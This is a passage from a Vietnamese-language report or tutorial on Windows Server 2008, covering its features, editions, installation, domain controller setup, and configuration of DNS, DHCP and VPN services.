phép các nhà quản trị lập trình nhằm tăng tính bảo mật cho mình

2.7. Read-Only Domain Controllers

Read-Only Domain Controller (RODC) là một kiểu Domain Controller mới

trên Windows Server 2008.Với RODC, doanh nghiệp có thể dễ dàng triển khai các

Domain Controller ở những nơi mà sự bảo mật không được đảm bảo về bảo mật.

RODC là một phần dữ liệu của Active Directory Domain Services.

Vì RODC là một phần dữ liệu của ADDS nên nó lưu trữ mọi đối tượng,

thuộc tính và các chính sách giống như domain controller, tuy nhiên mật khẩu thì bị

ngoại trừ.


2.8. Công nghệ Failover Clustering.

Clustering là công nghệ cho phép sử dụng hai hay nhiều server kết hợp với

nhau để tạo thành một cụm server để tăng cường tính ổn định trong vận hành.Nếu

server này ngưng hoạt động thì server khác trong cụm sẽ đảm nhận nhiệm vụ mà

server ngưng hoạt động đó đang thực hiện nhằm mục đích hoạt động của hệ thống

vẫn bình thường. Quá trình chuyên giao gọi là fail-over.

Những phiên bản sau hỗ trợ:

Windows Server 2008 Enterprise

Windows Server 2008 Datacenter

Windows Server 2008 Itanium

2.9. Windows Firewall with Advance Security

Windows Firewall with Advance Security cho phép người quản trị có thể cấu

hình đa dạng và nâng cao để tăng cường tính bảo mật cho hệ thống.

Windows Firewall with Advance Security có những điểm mới:

Kiểm soát chặt chẽ các kết nối vào và ra trên hệ thống (inbound và outbound)

IPsec được thay thế bằng khái niệm Connection Security Rule, giúp bạn có

thể kiểm soát và quản lý các chính sách, đồng thời giám sát trên firewall. Kết hợp

với Active Directory.

Hỗ trợ đầy đủ IPv6.

3. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008

3.1. Công nghệ ảo hóa Hyper-V

Hyper-V là công nghệ ảo hóa server thế hệ mới của Microsoft, sự thay đổi

lớn nhất mà Microsoft mang lại so với phiên bản Windows Server 2003. Hyper-V

hoạt động trên nền hệ điều hành 64-bit. Với Hyper-V, người sử dụng có thể sở hữu

một nền tảng ảo hóa linh hoạt, bảo mật, tối đa hiệu suất và tiết kiệm chi phí:

Hyper-V có thể thích nghi với doanh nghiệp lớn với hàng nghìn máy tính

hoặc các doanh nghiệp nhỏ hay văn phòng chi nhánh. Hyper-V hỗ trợ bộ nhớ ảo lên

đến 64GB, đa bộ vi xử lý.


Khả năng bảo mật giống như các server vật lý. Kết hợp các cộng cụ bảo mật

Windows Firewall, Network Access Protection…do đó tính bảo mật tốt như môi

trường thật.

Hyper-V giúp khai thác tối đa hiệu suất sử dụng phần cứng server. Bằng việc

hợp nhất server, cho phép một server vật lý có thể đóng nhiều vai trò của nhiều

server. Từ đó, tiết kiệm được chi phí từ các khoảng mua server, điện, không gian và

bảo trì.

Hyper-V chỉ có thể hỗ trợ đến 32 bộ vi xử lý.

3.2. Processor Compatibility Mode

Cho phép di trú các máy ảo sang một máy chủ vật lý khác với một phiên bản

CPU khác (nhưng không phải là CPU của nhà sản xuất khác). Trước đây, để chuyển

một máy ảo Hyper-V sang một phần cứng khác, các CPU phải giống nha

u, điều đó yêu cầu người dùng thường phải mua lại phần cứng mới.

3.3. File Classification Infrastructure

FCI là một tính năng built-in cho phép các chuyên gia CNTT phân loại và

quản lý dữ liệu trong các máy chủ file. Dữ liệu có thể được phân loại với tác động

doanh nghiệp mức thấp, cao hoặc trung bình, sau đó người dùng có thể backup các

dữ liệu quan trọng nhất dễ dàng hơn và hiệu quả hơn.

3.4. Quản lý trong ỗ đĩa và file

- Cung cấp khả năng thay đổi kich thước phân vùng.

- Shadow Copy hỗ trợ ổ đĩa quang, ổ đĩa mạng.

- Distributed File System được cải tiến.

- Cải tiến Failover Clustering.

- Internet Storage Naming Server cho phép đăng ký, hủy đăng ký tập trung

và truy xuất tới các ổ đĩa cứng iSCS.

3.5. Cải tiến giao thức và mã hóa

- Hỗ trợ mã hóa 128 và 256 bit cho giao thức chứng thực Keberos.


- Hàm API mã hóa mới hỗ trợ mã hóa vòng elip và cải tiến quản lý chứng

chỉ.

- Giao thức VPN mới Secure Socket Tunneling Protocol.

- AuthIP được sử dụng trong mạng VPN Ipsec.

- Giao thức Server Message Block 2.0 cung cấp các cải tiến trong truyền

thông.

3.6. Một số tính năng khác

- Windows Deployment Services thay thế cho Automated Deployment

Services và Remote Installation Services.

- IIS 7 thay thế IIS 6, tăng cường khả năng bảo mật, cải tiến công cụ chuẩn

đoán, hỗ trợ quản lý.

- Có thành phần "Desktop Experience" cung cấp khả năng cải tiến giao diện.

4. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008

Windows Server 2008 mang đến lợi ích trong bốn lĩnh vực:Web, Ảo hóa,

Bảo mật, Nền tảng vững chắc cho các hoạt động của tổ chức

4.1. Web

Windows Server 2008 cung cấp một nền tảng đồng nhất để triển khai dịch vụ

Web nhờ tích hợp IIS7.0,ASP.NET,Windows Communication Foundation và

Microsoft Windows SharePoint Services.

Lợi ích của IIS 7.0:

- Tính năng phân tích

- Quản trị hiệu quả.

- Nâng cao tính bảo mật.

- Giảm chi phí hỗ trợ.

- Giao diện thân thiện và tiện dụng

- Hỗ trợ việc sao chép giữa các site.

- Copy dễ dàng các thiết lập của trang web giữa các máy chủ web khác nhau

mà không cần phải thiết lập gì thêm.


- Chính sách phân quyền quản trị các ứng dụng và các site rõ ràng

4.2. Ảo hóa

Phiên bản 64 bit của Windows Server 2008 được tích hợp sẵn công nghệ ảo

hóa hypervisor :

- Cho phép máy ảo tương tác trực tiếp với phần cứng máy chủ hiệu quả hơn.

- Có khả năng ảo hóa nhiều hệ điều hành khác nhau trên cùng 1 phần cứng

máy chủ sẽ làm giảm chi phí, tăng hiệu suất sử dụng phần cứng, tối ưu hóa hạ tầng,

nâng cao tính sẵn sàng của máy chủ.

- Tiết kiệm chi phí mua sắm bản quyền phần mềm.

- Tich hợp và tập trung các ứng dụng phục vụ cho việc truy cập từ xa một

cách dễ dàng bằng cách sử dụng Terminal Services.

4.3. Bảo mật

Các tính năng an ninh bao gồm: Network Access Protection, Read-Only

Domain Controller, BitLocker, Windows Firewall… cung cấp các mức bảo vệ chưa

từng có cho hệ thống mạng, dữ liệu và công việc của tổ chức.

4.4. Network Access Protection (NAP)

- NAP dùng để thiết lập chính sách mạng đối với các máy trạm khi máy trạm

đó muốn kết nối váo hệ thống mạng của tổ chức. Yêu cầu an ninh đối với máy trạm

được kết nối với hệ thống mạng:

- Đã cài đặt phầm mềm diệt virus.

- Đã cập nhật phiên bản mới.

- Đã cài đặt các bản và lỗi hệ thống hoặc đã cài đặt phần mềm firewall.

4.5. Read-Only Domain Controller (RODC)

Là một kiểu Domain Controller (DC).

- RODC chứa một bản sao các dữ liệu "chỉ đọc" của dữ liệu Active Directory

(AD).

- User không thẻ ghi trực tiếp vào RODC.


- RODC không chứa thông tin về mật khẩu trong AD, mà chỉ caching các

users được phép sử dụng ở đó.

RODC thích hợp cho việc triển khai ở các chi nhánh, nơi có điều kiện bảo

mật kém cũng như trình độ của nhân viên IT còn hạn chế.

4.6. BitLocker

- Bảo vệ an toàn cho máy chủ, máy trạm, máy tính di động.

- Mã hóa nội dung của ổ đĩa nhằm ngăn cản

- Nâng cao khả năng bảo vệ dữ liệu: kết hợp chức năng mã hóa tập tin hệ

thống và kiểm tra tinh toàn vẹn của các thành phần khi boot.

- Toàn bộ tập tin hệ thống được mã hóa, gồm cả file swap và file hibernation.

4.7. Windows Firewall

- Ngăn chặn các lưu lượng mạng theo cấu hình và các ứng dụng dạng chạy

để bảo vệ mạng khỏi các chương trình và người dùng nguy hiểm.

- Hỗ trợ ngăn chặn các thông tin vào và ra.

- Sử dụng MMC snap-in ( Windows Firewall with Adbanced Security) để

đơn giản hóa việc cấu hình, quản trị.

5. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008

5.1. Windows Server 2008

Ứng dụng cho các trung tâm data lớn, ứng dụng nghiệp vụ riêng,... khả năng

mở rộng cao cho tới 64 bộ xử lý.

5.2. Windows Server 2008 Standard Edition

Windows Server 2008 Standard là một trong những phiên bản ít tốn kém nhất

của các phiên bản khác nhau có sẵn. Windows Server 2008 Stardard hỗ trợ tới 4GB

RAM và 4 bộ vi xử lý.

Chủ yếu nhắm mục tiêu và các doanh nghiệp vừa và nhỏ. Chỉ có thể nâng cấp

lên Windows Server 2008 Standard từ Windows 2000 Server và Windows Server

2003 Standard Edition.


5.3. Windows Server 2008 Enterprise Edition

Windows Server 2008 Enterprise Edition cung cấp chức năng lớn hơn và có

khả năng mở rộng hơn so với bản tiêu chuẩn. Cũng như phiên bản Standard Edition

thì phiên bản Enterprise cũng có cả hai phiên bản 32-bit và 64-bit. Hỗ trợ 8 bộ xử lý

và lên tới 64GB bộ nhớ RAM trên hệ thống 32-bit và 2TB RAM trên hệ thống 64-

bit.

Các tính năng khác của ấn bản Doanh nghiệp bao gồm hỗ trợ Clustering đến

8 nút và Active Directory Federated Services (AD FS).

Các phiên bản Windows Server 2000, Windows 2000 Advanced Server,

Windows Server 2003 Standard Edition và Windows Server 2003 Enterprise Edition

đều có thể được nâng cấp lên Windows Server 2008 Enterprise Edition.

5.4. Windows Server 2008 Datacenter Edition

Phiên bản Datacenter đại diện cuối cùng của loạt sản phẩm máy chủ

Windows 2008 và mục tiêu là nhiệm vụ quan trọng đòi hỏi các doanh nghiệp ổn

định và mức độ thời gian hoạt động cao. Windows Server 2008 phiên bản

Datacenter là liên hệ chặt chẽ với các phần cứng cơ bản thông qua việc thực hiện

tùy chỉnh Hardware Abstraction Layer (HAL).

Windows server 2008 Datacenter cũng hỗ trợ hai phiên bản 32 bit và 64 bit.

Nó hỗ trợ 64GB bộ nhớ RAM trên nền 32 bit và lên tới 2TB RAM trên nền 64 bít.

Ngoài ra phiên bản này còn hỗ trợ tối thiểu là 8 bộ vi xử lý và tối đa là 64.

Để nâng cấp lên phiên bản này thì phải là các phiên bản Datacenter 2000 và

2003.

5.5. Windows Web Server 2008

Windows Web Server 2008 là một phiên bản của Windows Server 2008 được

thiết kế chủ yếu cho mục đích cung cấp các dịch vụ web. Nó bao gồm Internet

Information Services (IIS) 7,0 cùng với các dịch vụ liên quan như Simple Mail

Transfer Protocol (SMTP) và Telnet. Nó cũng có các phiên bản 32-bit và 64-bit,


phiên bản và hỗ trợ lên đến 4 bộ vi xử lý. RAM được giới hạn 4GB và 32GB trên

32-bit và 64-bit hệ thống tương ứng.

Windows Web Server 2008 thiếu nhiều tính năng hiện diện trong các phiên

bản khác như phân nhóm,mã hóa ổ đĩa BitLocker, Multi I/O,Windows Internet

Naming Service (WINS),Removable Storage Management và SAN Management.

6. CÀI ĐẶT WINDOWS SERVER 2008

6.1. Yêu cầu phần cứng

Phần cứng Yêu cầu tối thiểu Đề nghị

Bộ vi xử lý 1 Ghz (x86), 1,4 Ghz (x64) 2Ghz hoặc lớn hơn

RAM 512MB RAM 2GB

Dung lượng trống 15GB 40GB

Windows Server 2008 hỗ trợ cả 2 cấu trúc vi xử lý 32-bit và 64-bit. Tuy

nhiên, phiên bản mới nhất là Windows Server 2008 R2, Windows Midmarket

Server và Windows Small Business với những tính năng đa dịch vụ, các phiên bản

này chỉ hỗ trợ cấu trúc vi xử lý 64-bit.

RAM hỗ trợ tối đa cho hệ thống 32-bit là 4GB khi chạy phiên bản

Standard Edition và 64GB khi chạy phiên bản Enterprise và Datacenter. Nếu

chạy hệ thống 64-bit, bộ nhớ RAM có thể hỗ trợ lên dến 32GB và 2TB RAM cho

phiên bản Enterprise và Datacenter. Thêm vào đó, Windows Server 2008 hỗ trợ

hệ thống Itanium, tuy nhiên chip xử lí Intel Itanium 2 nhân là cần thiết.

6.2. Các cách cài đặt

Có 6 cách cài đặt Windows Server 2008

Tự cài đặt các nâng cấp

Cài đặt từ kịch bản

Sử dụng Sconfig

Visual Core Configurator 2008

Cài đặt bằng cách sử dụng Core Configurator 2.0

Cài đặt trực tiếp từ đĩa CD Windows Server 2008


7. NÂNG CẤP LÊN WINDOWS SERVER 2008

Để nâng cấp lên phiên bản Windows Server 2008, cần phải chạy các hệ điều

hành ở cấp độ server. Không thể nâng cấp các phiên bản Windows dành cho người

dùng như Windows XP hoặc Windows Vista lên Windows Server 2008. Để nâng

cấp lên Windows Server 2008, hệ thống của bạn phải chạy Windows Server

2003. Việc nâng cấp từ Windows NT 4.0 và Windows 2000 Server không được hỗ

trợ. Việc nâng cấp từ những phiên bản Windows Server 2003 lên phiên bản

Windows Server 2008 Server Core không được hỗ trợ. Việc nâng cấp chỉ thực hiện

được ở những phiên bản giống nhau. Khi nâng cấp lên phiên bản Windows Server

2008, mọi cấu hình thiết lập, file và các chương trình đều được giữ lại


Những phiên bản trướcNâng cấp lên Windows

Server 2008

Microsoft Windows Server 2003 R2

Standard, Enterprise hoặc DatacenterEdition

Hỗ trợ đầy đủ

Microsoft Windows Server 2003

Service Pack 1(SP1) Standard, Enterprise hoặc

Datacenter Edition


Microsoft Windows Server 2003

Service Pack 2 (SP2) Standard, Enterprise

hoặc Datacenter Edition


Windows NT 4.0 Không hỗ trợ

Windows 2000 Server Không hỗ trợ

Windows XP Không hỗ trợ

Windows Vista Không hỗ trợ

Windows 7 Không hỗ trợ

8. QUÁ TRÌNH CÀI ĐẶT WINDOWS SERVER 2008

Đặt đĩa CD vào ổ đĩa, khởi động lại máy tính và bắt đầu tiến hành quá trình

cài đặt.

Language to instalk : ngôn ngữ bạn muốn hiển thị.

Time and currency format : định dạng thời gian và tiền tệ.

Keyboard or input method : định dạng bàn phím và phương thức nhập

chữ.Sau khi lựa chọn, click Next để tiếp tục cài đặt


Click Install now để bắt đầu cài đặt.

Lựa chọn phiên bản Windows Server thích hợp, ở đây chúng ta chọn phiên

bản Windows Server Standard without Hyper-V. Click Next để tiếp tục.


Tại bảng MICROSOFT PRE-RELEASE SOFTWARE LICENSE

TERMS là những điều khoản sử dụng sản phẩm của Microsoft. Đánh dấu chọn

vào I accept the license terms để chấp nhận những điều khoản đó và click

Next để tiếp tục.


Chọn Custom (advaneced) để tiến hành cài đặt tùy chọn.

Tiếp theo là chọn ổ đĩa để cài dặt Windows. Tiếp tục click Next sau khi đã

chọn ổ đĩa cài đặt.


Đợi cho đến khi hoàn tất cài đặt Windows Server 2008

Sau khi hệ thống hoàn tất cái đặt sẽ tự động đăng nhập vời tài khoản

Administrator, tuy nhiên mật khẩu đang ở trạng thái trống (blank) vì thế cần phải

thiết lập mật khẩu ở lần đăng nhập đầu tiên.

Click OK để tiến hành thay đổi mật khẩu.Sau đó đăng nhập vào bằng mật

khẩu vừa thay đổi.

Đến đây quá trình cài đặt kết thúc.


CHƯƠNG 4: DOMAIN

1. CÀI ĐẶT DOMAIN

Trên Windows Server 2008 ta vẫn cần chạy lệnh dcpromo từ nhắc lệnh

Run, tuy nhiên cần phải cài đặt Active Directory Domain Controller role, đầu

tiên bạn cài đặt role, sau đó chạy dcpromo.Vào Server ManagerRolesAdd

Roles

Xuất hiện trang Before You Begin, nhấn Next để tiếp tục.


Chọn Active Directory Domain ServicesAdd Required Features để

cài đặt thêm các tính năng này với Active Directory Server Role.

Sau khi chọn Active Directory DC Server Role, bạn sẽ thấy các thông tin về

Server Role.

Kích Install để cài đặt các file yêu cầu nhằm chạy dcpromo


Cài đặt được thực hiện thành công. Kích Close.

Trong bài này, chúng ta sẽ sử dụng 2 máy.


PC1: Là máy sử dụng Windows Server 2008.

PC2: Là máy sử dụng Client sử dụng Windows 7.

Quá trình cài đặt sẽ trải qua 2 bước chính:

Bước 1: Chỉnh Preferred DNS

- Ở bước này chúng ta sẽ chỉnh Preferred DNS về chính máy tính của chúng

ta, ở đây là ip 192.168.1.1.

Trong trường hợp giả sử chúng ta quên làm bước này, thì quá trình nâng cấp

vẫn diễn ra bình thường, và Windows sẽ tự chỉnh Preferred DNS về địa chỉ

192.168.1.1 Nhưng tốt nhất các bạn nên làm bước chỉnh này

Bước 2: Nâng cấp lên Domain Controller

- Bạn vào Start-> Chọn Run, gõ dcpromo và Enter, sau đó lần lượt làm theo

các bước sau:


Tiếp nào.

Thao tác này sẽ khởi chạy Welcome to the Active Directory Domain

Service Installation Wizard. Kích Next.

Sau đó tiếp tục nhấn Next.

Trong trang Choose a Deployment Configuration Create a new

domain in a new forest..


Trong trang Name the Forest Root Domain, nhập vào tên của miền trong

hộp nhập liệu FQDN of the forest room domain.Nhấn Next để tiếp tục.

Nhấn Next để tiếp tục.


Trong trang Set Forest Functional Level, chọn Windows Server 2008.

Nhấn Next để tiếp tục.

Trong trang Additional Domain Controller Options, Chọn DNS

server và kích Next.


Một hộp thoại sẽ xuất hiện nói răng không thể tạo đại biểu cho máy chủ DNS

này vì không thể tìm thấy vùng xác thực hoặc nó không chạy Windows DNS server.

Lý do cho điều này là vì đây là DC đầu tiên trên mạng. Nhấn Next để tiếp tục.

Để lại thư mục Database, Log Files và SYSVOL ,kích Next.


Trong Directory Service Restore Mode Administrator Password,

nhập một mật khẩu mạnh vào các hộp nhập liệu Password và Confirm

password.

Xác nhận các thông tin trên trang Summary và kích Next.


Active Directory sẽ cài đặt. Đặt một dấu kiểm vào hộp chọn Reboot on

completion để máy tính sẽ tự động khởi động lại khi cài đặt DC được hoàn tất.


2. JOIN DOMAIN

Chỉnh ip của máy Windows XP sao cho cùng địa chỉ của lớp mà ta đã gán ở

máy Server và DNS trỏ về địa chỉ ip của máy Server.

Vào Start click phải computer chọn properties. Chọn Tab Computer Name


Click vào Change để mở hộp thoại Computer Name Change. Sau đó click

chọn Domain và nhập tên Domain vào khung Oke


Nhập user Administrator và pass.

Click OK và máy tính sẽ khởi động lại. Sau khi khởi động là máy đã được

join thành công. Vào server để tạo user và sau đó đăng nhập vào máy win xp để

kiểm tra.


CHƯƠNG 5: TRIỂN KHAI CÁC DỊCH VỤ MẠNG

1. DỊCH VỤ DNS

1.1. Giới thiệu về DNS

DNS (Domain Name System) Server là máy chủ được dùng để phân giải

domain thành địa chỉ IP và ngược lại. Về cách thức hoạt động, DNS Server lưu trữ

một cơ sở dữ liệu bao gồm các bản ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi

máy client gửi yêu cầu phân giải đến, DNS Server tiến hành tra cứu trong cơ sở dữ

liệu và gửi kết quả tương ứng về máy client.

1.2. Cài đặt DNS

Vào Server Manager Roles Add Roles.Tại bảng Select Server Roles,

chọn DNS Server

Sau đó nhấn Next để tiếp tục

Chọn Instal. Tại bảng Confirm Installation Selections xác nhận việc cài

đặt.


Chọn Close để hoàn tất cài đặt.

1.3. Cấu hình DNS

Đối với DNS Server,thông thường nên xây dựng đồng thời hai hệ thống là

DNS Server chính (Primary) và DNS Server dự phòng (Secondary) dùng chung một

cơ sở dữ liệu. Với phương pháp này,sẽ hạn chế khả năng dịch vụ DNS bị ngưng khi

có sự cố xảy ra trên hệ thống.

Vào Start Administrative Tools DNS.

Nhấp chuột phải vào Forward Lookup Zones và chọn New Zone.


Tại bản Welcome to the New Zone Wizard ,chọn Next


Tại bảng Zone Type chọn Primary zone để cấu hình DNS Server chính.

Chọn Next. Tại bảng Zone Name gõ tên domain vào, chọn Next

Tại bảng New Zone Wizard, để mặc định. Chọn Next.

Chọn Next. Tại bảng Completing the New Zone Wizard xem lại thông tin.

Sau đó chọn Finish để hoàn tất.

Nhấp chuột phải vào ReverseLookup Zones và chọn New Zone.


Tại bảng Welcome to the New Zone Wizard chọn Next.

Tại bảng Zone Type chọn Primary zone để cấu hình chức năng reverse cho

DNS Server chính.

Chọn Next.Tại bảng Reverse Lookup Zone Name chọn kiểu IP cần phân giải.

Ở đây chọn IPv4.


Chọn Next. Điền Network ID và chọn Next.

Tại bảng Zone File để mặc định. Chọn Next.

Tại bảng Dynamic Update chọn Allow both nonsecure dynamic updates.

Chọn Next và xem lại thông tin thiết lập, và sau đó chọn Finish để kết thúc.

Bổ sung các bản ghi DNS vào DNS Server

Start Administrative Tools DNS. Nhấp chuột phải vào zone và chọn

New - Gõ tên host vào mục Name, gõ địa chỉ IP vào mục IP address. Nếu muốn tạo

ra một bản ghi DNS phân giải ngược tương ứng thì đánh dấu chọn Create associated

pointer (PTR) record.


Sau đó chọn Add Host.Xuất hiện thông báo thành công.

Kiểm tra


2. DỊCH VỤ DHCP

2.1. Giới thiệu về dịch vụ DHCP

- Dịch vụ DHCP cho phép chúng ta cấp động các thông số cấu hình mạng

cho các máy trạm.(client).

- Cơ chế sử dụng các thông số mạng được cấp phát động có ưu điểm hơn so

với cơ chế khai báo tĩnh các thông số mạng như:

- Khắc phục được tình trạng đụng địa chỉ IP và giảm chi phí quản trị cho hệ

thống mạng.Giúp cho các nhà cung cấp dịch vụ (ISP) tiết kiệm được số lượng địa

chỉ IP thật (Public IP).Phù hợp cho các máy tính thường xuyên di chuyển qua lại

giữa các mạng.Kết hợp với hệ thống mạng không dây (Wireless) cung cấp các điểm

Hotspot như: nhà ga, sân bay, trường học…

2.2. Hoạt động của giao thức

Giao thức DHCP làm việc theo mô hình client/server.Khi máy client khởi

động, máy sẽ gửi broadcast gói tin DHCPDISCOVER, yêu cầu một server phục vụ

mình. Gói tin này cũng chứa địa chỉ MAC của máy client.Các máy Server trên mạng

khi nhận được gói tin yêu cầu đó, nếu còn khả năng cung cấp địa chỉ IP, đều gửi lại

cho máy Client gói tin DHCPOFFER, đề nghị cho thuê một địa chỉ IP trong một

khoản thời gian nhất định, kèm theo là một subnet mask và địa chỉ của Server.

2.3. Cài đặt DHCP trên windows server 2008

Vào Server Manger Roles Add Roles.


Nhấn Nexttrong mục Roles chọn “DHCP Server”. Nhấn Next.

Trong bảng này giới thiệu về DHCP và các điểm cần lưu ý Things to Note.

Tiếp tục nhấn Next.

Chọn card mạng sử dụng dịch vụ này ở đây chúng ta chỉ có một card mạng

nên tiếp tục nhấn Next nhấn Next.

Trong mục “Parent Domain” điền tên domain và điền IP DNS server ở mục

“Preferred DNS…” và nhấn Validate để kiểm tra và xác nhận tồn tại và tiếp tục

nhấn Next.


Tiếp tục nhấn next

Tiếp tục nhấn Next.


Tiếp tục bấm Next. Trong Bảng Configure DHCPv6 Stateless Mode ta chọn

Disable DHCPv6 stateless mode for this server và bấm Next

Chọn user có quyền AuthorNext


Xác nhận lại thông tin trước khi cài đặt dịch vụ DHCP. Bấm Install để cài đặt

- Cài đặt Role hoàn tất, và nhấn Close

2.4. Cấu hình DHCP

2.4.1. Tạo Scop

Vào Administrative ToolsDHCP.

Nhấn chuột phải vào IPv4 và New Scope.

Hộp thoại New Scope hiện ra và Next.


Hộp thoại Scope Name vàĐiền tên của scope vào mục Name và nhấn Next

Hộp thoại IP Address Range,điền thông số range IP cấp phát và subnet

mask Next.


Hộp thoại Lease Duration: thời gian thuê địa chỉ IP mặc định là 8 ngày

Hộp thoại Configuration DHCP Options yêu cầu chúng ta cấu hình thông

số dịch vụ của scope ngay bây giờ hoặc để sau. Ở đây ta chọn No, I will configure

these option later và nhấn Next.


Bấm Fisnish để kết thúc

2.4.2. Thay đổi options của Scope

- Xổ scope cần thao tác và chuột phải scope optionsConfigure Options.

- Hộp thoại Scope Options hiện ra, ở trường Available Options là những

thuộc tính sẵn sàng màchúng ta có thể thay đổi với những thuộc tính đã stick là

những thuộc tính đã được cấu hìnhtrước đó.

- Chúng ta sẽ thử cấu hình default gateway lại cho scope này, chọn Router.

Router Options hiện ta cho chúng ta thêm xóa và edit với những thuộc tính khác

cũng vậy


Kiểm tra

3. DỊCH VỤ VPN

Giải pháp VPN (Virtual Private Network) được thiết kế cho những tổ chức có

xu hướng tăng cường thông tin từ xa vì địa bàn hoạt động rộng (trên toàn quốc hay

toàn cầu). Tài nguyên ở trung tâm có thể kết nối đến từ nhiều nguồn nên tiết kiệm

được được chi phí và thời gian


Một mạng VPN điển hình bao gồm mạng LAN chính tại trụ sở (Văn phòng

chính), các mạng LAN khác tại những văn phòng từ xa, các điểm kết nối (như 'Văn

phòng' tại gia) hoặc người sử dụng (Nhân viên di động) truy cập đến từ bên ngoài.

3.1. Khái niệm.

Mạng riêng ảo hay VPN (Virtual Private Network) là một mạng dành riêng

để kết nối các máy tính lại với nhau thông qua mạng Internet công cộng. Những

máy tính tham gia mạng riêng ảo sẽ "nhìn thấy nhau" như trong một mạng nội bộ -

LAN (Local Area Network).

Internet là một môi trường công cộng, việc chia sẻ dữ liệu có tính riêng tư

thông qua Internet là cực kỳ nguy hiểm vì những dữ liệu đó có thể dễ dàng bị rò rỉ,

bị ăn cắp... Mạng riêng ảo là giao thức trợ giúp việc kết nối các máy tính lại với

nhau thông qua một kênh truyền dẫn dữ liệu (tunel) riêng đã được mã hóa.

Mạng riêng ảo giúp bảo vệ dữ liệu trong khi chúng được truyền trên Internet

vì vậy mạng riêng ảo thường được ứng dụng trong các trường hợp sau:

Làm việc từ xa: Truy cập từ xa thông qua Internet vào mạng của công ty để

chia sẻ dữ liệu cũng như thực thi các ứng dụng nội bộ.

Kết nối nhiều mạng với nhau (Site-to-Site): Nếu công ty có nhiều văn phòng,

việc kết nối các mạng lại với nhau thành một mạng thống nhất sẽ đem lại hiệu quả

ấn tượng trong việc quản lý & chia sẻ thông tin.


Tạo phiên làm việc an toàn: Mạng riêng ảo là giải pháp tốt & với chi phí thấp

cho một số công việc đòi hỏi tính bảo mật cao như quản trị máy chủ, website, cơ sở

dữ liệu...

Nếu thường xuyên làm việc trên Internet & thông tin là tài sản vô giá, bạn

nên ứng dụng mạng riêng ảo vào công việc của mình.

3.2. Các loại VPN.

Có hai loại phổ biến hiện nay là VPN truy cập từ xa (Remote-Access ) và

VPN điểm-nối-điểm (site-to-site)

VPN truy cập từ xa còn được gọi là mạng Dial-up riêng ảo (VPDN), là một

kết nối người dùng-đến-LAN, thường là nhu cầu của một tổ chức có nhiều nhân

viên cần liên hệ với mạng riêng của mình từ rất nhiều địa điểm ở xa. Ví dụ như công

ty muốn thiết lập một VPN lớn phải cần đến một nhà cung cấp dịch vụ doanh

nghiệp (ESP). ESP này tạo ra một máy chủ truy cập mạng (NAS) và cung cấp cho

những người sử dụng từ xa một phần mềm máy khách cho máy tính của họ. Sau đó,

người sử dụng có thể gọi một số miễn phí để liên hệ với NAS và dùng phần mềm

VPN máy khách để truy cập vào mạng riêng của công ty. Loại VPN này cho phép

các kết nối an toàn, có mật mã.

Hình minh họa cho thấy kết nối giữa Văn phòng chính và "Văn phòng" tại

gia hoặc nhân viên di động là loại VPN truy cập từ xa).

VPN điểm-nối-điểm là việc sử dụng mật mã dành cho nhiều người để kết nối

nhiều điểm cố định với nhau thông qua một mạng công cộng như Internet. Loại này

có thể dựa trên Intranet hoặc Extranet. Loại dựa trên Intranet: Nếu một công ty có

vài địa điểm từ xa muốn tham gia vào một mạng riêng duy nhất, họ có thể tạo ra

một VPN intranet (VPN nội bộ) để nối LAN với LAN.

Loại dựa trên Extranet: Khi một công ty có mối quan hệ mật thiết với một

công ty khác (ví dụ như đối tác cung cấp, khách hàng...), họ có thể xây dựng một

VPN extranet (VPN mở rộng) kết nối LAN với LAN để nhiều tổ chức khác nhau có

thể làm việc trên một môi trường chung.


Trong hình minh họa trên, kết nối giữa Văn phòng chính và Văn phòng từ xa

là loại VPN Intranet, kết nối giữa Văn phòng chính với Đối tác kinh doanh là VPN

Extranet.

3.3. Bảo mật trong VPN

Tường lửa (firewall) là rào chắn vững chắc giữa mạng riêng và Internet. Bạn

có thể thiết lập các tường lửa để hạn chế số lượng cổng mở, loại gói tin và giao thức

được chuyển qua. Một số sản phẩm dùng cho VPN như router 1700 của Cisco có

thể nâng cấp để gộp những tính năng của tường lửa bằng cách chạy hệ điều hành

Internet Cisco IOS thích hợp. Tốt nhất là hãy cài tường lửa thật tốt trước khi thiết

lập VPN.

Mật mã truy cập là khi một máy tính mã hóa dữ liệu và gửi nó tới một máy

tính khác thì chỉ có máy đó mới giải mã được. Có hai loại là mật mã riêng và mật

mã chung.

Mật mã riêng (Symmetric-Key Encryption): Mỗi máy tính đều có một mã bí

mật để mã hóa gói tin trước khi gửi tới máy tính khác trong mạng. Mã riêng yêu cầu

bạn phải biết mình đang liên hệ với những máy tính nào để có thể cài mã lên đó, để

máy tính của người nhận có thể giải mã được.

Mật mã chung (Public-Key Encryption) kết hợp mã riêng và một mã công

cộng. Mã riêng này chỉ có máy của bạn nhận biết, còn mã chung thì do máy của bạn

cấp cho bất kỳ máy nào muốn liên hệ (một cách an toàn) với nó. Để giải mã một

message, máy tính phải dùng mã chung được máy tính nguồn cung cấp, đồng thời

cần đến mã riêng của nó nữa. Có một ứng dụng loại này được dùng rất phổ biến là

Pretty Good Privacy (PGP), cho phép bạn mã hóa hầu như bất cứ thứ gì.

Giao thức bảo mật giao thức Internet (IPSec) cung cấp những tính năng an

ninh cao cấp như các thuật toán mã hóa tốt hơn, quá trình thẩm định quyền đăng

nhập toàn diện hơn.

IPSec có hai cơ chế mã hóa là Tunnel và Transport. Tunnel mã hóa tiêu đề

(header) và kích thước của mỗi gói tin còn Transport chỉ mã hóa kích thước. Chỉ


những hệ thống nào hỗ trợ IPSec mới có thể tận dụng được giao thức này. Ngoài ra,

tất cả các thiết bị phải sử dụng một mã khóa chung và các tường lửa trên mỗi hệ

thống phải có các thiết lập bảo mật giống nhau. IPSec có thể mã hóa dữ liệu giữa

nhiều thiết bị khác nhau như router với router, firewall với router, PC với router, PC

với máy chủ.

Máy chủ AAA là viết tắt của ba chữ Authentication (thẩm định quyền truy

cập), Authorization (cho phép) và Accounting (kiểm soát). Các server này được

dùng để đảm bảo truy cập an toàn hơn. Khi yêu cầu thiết lập một kết nối được gửi

tới từ máy khách, nó sẽ phải qua máy chủ AAA để kiểm tra. Các thông tin về những

hoạt động của người sử dụng là hết sức cần thiết để theo dõi vì mục đích an toàn.

3.4. Sản phẩm công nghệ dành cho VPN

